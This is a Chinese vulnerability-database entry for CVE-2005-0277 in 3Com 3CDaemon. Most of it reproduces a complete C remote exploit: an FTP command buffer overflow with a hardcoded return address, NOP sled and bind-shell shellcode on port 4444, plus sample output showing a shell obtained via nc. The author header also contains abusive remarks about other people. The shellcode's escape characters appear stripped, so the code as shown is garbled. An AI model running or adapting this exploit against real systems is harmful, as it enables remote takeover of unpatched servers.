3Com 3CDaemon多个远程安全漏洞

3Com 3CDaemon多个远程安全漏洞

漏洞ID 1108468 漏洞类型 缓冲区溢出
发布时间 2005-02-17 更新时间 2005-10-20
图片[1]-3Com 3CDaemon多个远程安全漏洞-安全小百科CVE编号 CVE-2005-0277
图片[2]-3Com 3CDaemon多个远程安全漏洞-安全小百科CNNVD-ID CNNVD-200505-486
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/825
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-486
|漏洞详情
3CDaemon是一款免费的集成了TFTP、FTP和SYSLOG功能的应用程序。3CDaemon存在多个安全问题,远程攻击者可以利用这些漏洞进行拒绝服务、格式串及缓冲区溢出等攻击。
|漏洞EXP
/* Email fixed brotha /str0ke */
/*
     3Com Ftp Server remote overflow exploit
     author : c0d3r "kaveh razavi" [email protected]
  package : 3CDaemon version 2.0 revision 10
  advisory : http://secway.org/advisory/ad20041011.txt
  company address : 3com.com
  it is just a simple PoC tested on winxp sp 1 and may not work on other systems .
  just a lame coded software that didnt cost to bother myself to develop
  the exploit code . every command has got overflow .
  compiled with visual c++ 6 : cl 3com.c
  greetz : LorD and NT of Iran Hackers Sabotages , irc.zirc.org #ihs
  Jamie of exploitdev (hey man how should I thank u with ur helps?),
  sIiiS and vbehzadan of hyper-security , pishi , redhat , araz , simorgh
  securiteam , roberto of zone-h , milw0rm (dont u see that my mail address has changed?)
  Lamerz :
  [email protected] with a fucked ass ! , konkoor ( will be dead soon !! )
  ashiyane digital lamerz team ( abroo har chi iranie bordin khak barsara ! )

/*
/*
D:projects>3com.exe 127.0.0.1 21 c0d3r secret

-------- 3Com Ftp Server remote exploit by c0d3r --------

[*] building overflow string
[*] attacking host 127.0.0.1
[*] packet size = 673 byte
[*] connected
[*] sending username
[*] sending password
[*] exploit sent successfully try nc 127.0.0.1 4444

D:projects>nc 127.0.0.1 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Program Files3Com3CDaemon>

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define address 0x77A7EE6C // jmp esp lays in shell32.dll in my box
#define size 673 // 3 byte command + 235 byte NOP junk +
                           // 4 byte return address + 430 byte shellc0de

 int main (int argc, char *argv[]){

 char shellc0de[] = // some NOPS + shellcode bind port 4444

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90xEBx10x5Ax4Ax33xC9x66"
"xB9x7Dx01x80x34x0Ax99xE2xFAxEBx05xE8xEBxFFxFFxFF"
"x70x95x98x99x99xC3xFDx38xA9x99x99x99x12xD9x95x12"
"xE9x85x34x12xD9x91x12x41x12xEAxA5x12xEDx87xE1x9A"
"x6Ax12xE7xB9x9Ax62x12xD7x8DxAAx74xCFxCExC8x12xA6"
"x9Ax62x12x6BxF3x97xC0x6Ax3FxEDx91xC0xC6x1Ax5Ex9D"
"xDCx7Bx70xC0xC6xC7x12x54x12xDFxBDx9Ax5Ax48x78x9A"
"x58xAAx50xFFx12x91x12xDFx85x9Ax5Ax58x78x9Bx9Ax58"
"x12x99x9Ax5Ax12x63x12x6Ex1Ax5Fx97x12x49xF3x9AxC0"
"x71x1Ex99x99x99x1Ax5Fx94xCBxCFx66xCEx65xC3x12x41"
"xF3x9CxC0x71xEDx99x99x99xC9xC9xC9xC9xF3x98xF3x9B"
"x66xCEx75x12x41x5Ex9Ex9Bx99x9Dx4BxAAx59x10xDEx9D"
"xF3x89xCExCAx66xCEx69xF3x98xCAx66xCEx6DxC9xC9xCA"
"x66xCEx61x12x49x1Ax75xDDx12x6DxAAx59xF3x89xC0x10"
"x9Dx17x7Bx62x10xCFxA1x10xCFxA5x10xCFxD9xFFx5ExDF"
"xB5x98x98x14xDEx89xC9xCFxAAx50xC8xC8xC8xF3x98xC8"
"xC8x5ExDExA5xFAxF4xFDx99x14xDExA5xC9xC8x66xCEx79"
"xCBx66xCEx65xCAx66xCEx65xC9x66xCEx7DxAAx59x35x1C"
"x59xECx60xC8xCBxCFxCAx66x4BxC3xC0x32x7Bx77xAAx59"
"x5Ax71x76x67x66x66xDExFCxEDxC9xEBxF6xFAxD8xFDxFD"
"xEBxFCxEAxEAx99xDAxEBxFCxF8xEDxFCxC9xEBxF6xFAxFC"
"xEAxEAxD8x99xDCxE1xF0xEDxCDxF1xEBxFCxF8xFDx99xD5"
"xF6xF8xFDxD5xF0xFBxEBxF8xEBxE0xD8x99xEExEAxABxC6"
"xAAxABx99xCExCAxD8xCAxF6xFAxF2xFCxEDxD8x99xFBxF0"
"xF7xFDx99xF5xF0xEAxEDxFCxF7x99xF8xFAxFAxFCxE9xED"
"x99xFAxF5xF6xEAxFCxEAxF6xFAxF2xFCxEDx99";
  
  unsigned char *recvbuf,*user,*pass;
  unsigned int rc,addr,sock,rc2 ;
  struct sockaddr_in tcp;
  struct hostent *hp;
  WSADATA wsaData;
  char buffer[size];
  unsigned short port;
  char *ptr;
  long *addr_ptr;
  int NOP_LEN = 200,i,x=0,f = 200;
  if(argc < 5) {
      printf("n-------- 3Com Ftp Server remote exploit by c0d3r --------n");
   printf("-------- usage : 3com.exe host port user pass --------n");
   printf("-------- eg: 3com.exe 127.0.0.1 21 c0d3r secret --------nn");
  exit(-1) ;
  }
  printf("n-------- 3Com Ftp Server remote exploit by c0d3r --------nn");
  recvbuf = malloc(256);
  memset(recvbuf,0,256);
  
  //Creating exploit code
  printf("[*] building overflow string");
    memset(buffer,0,size);
       ptr = buffer;
       addr_ptr = (long *) ptr;
 
     for(i=0;i < size;i+=4){
   *(addr_ptr++) = address;
  }
   buffer[0] = 'C';buffer[1] = 'D';buffer[2] = ' ';
   for(i = 3;i != 235;i++){
   buffer[i] = 0x90;
  }
     i = 239;
  for(x = 0;x != strlen(shellc0de);x++,i++){
   buffer[i] = shellc0de[x];
  }
  buffer[size] = 0;
 
  //EO exploit code

  user = malloc(256);
  memset(user,0,256);

  pass = malloc(256);
  memset(pass,0,256);

  sprintf(user,"user %srn",argv[3]);
  sprintf(pass,"pass %srn",argv[4]);
  
   if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("[-] WSAStartup failed !n");
   exit(-1);
  }
 hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp) && (addr == INADDR_NONE) ){
   printf("[-] unable to resolve %sn",argv[1]);
   exit(-1);
  }
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!sock){
   printf("[-] socket() error...n");
   exit(-1);
  }
   if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
  tcp.sin_family = AF_INET;
  port=atoi(argv[2]);
  tcp.sin_port=htons(port);
   
  
  printf("n[*] attacking host %sn" , argv[1]) ;
  
  Sleep(1000);
  
  printf("[*] packet size = %d byten" , sizeof(buffer));
  
  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
     Sleep(1000) ;
  printf("[*] connectedn") ;
     rc2=recv(sock,recvbuf,256,0);
     printf("[*] sending usernamen");
     send(sock,user,strlen(user),0);
     send(sock,'n',1,0);
     printf("[*] sending passwordn");
     Sleep(1000);
  send(sock,pass,strlen(pass),0);
     send(sock,buffer,strlen(buffer),0);
  send(sock,'n',1,0);
     printf("[*] exploit sent successfully try nc %s 4444n" , argv[1]);
  }
  
  else {
      printf("[-] 3CDaemon is not listening .... n");
 }
  shutdown(sock,1);
  closesocket(sock);
  

}

// milw0rm.com [2005-02-17]
|参考资料

来源:XF
名称:3cdaemon-long-command-dos(18754)
链接:http://xforce.iss.net/xforce/xfdb/18754
来源:BID
名称:12155
链接:http://www.securityfocus.com/bid/12155
来源:BUGTRAQ
名称:200502183com3CDaemonFTPUnauthorized”USER”RemoteBOverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110886719528518&w;=2
来源:BUGTRAQ
名称:200501043Com3CDaemonMultipleVulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110485674622696&w;=2

相关推荐: VisualShapers ezContents服务器登录漏洞

VisualShapers ezContents服务器登录漏洞 漏洞ID 1201971 漏洞类型 未知 发布时间 2004-02-11 更新时间 2004-02-11 CVE编号 CVE-2003-1214 CNNVD-ID CNNVD-200402-043…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享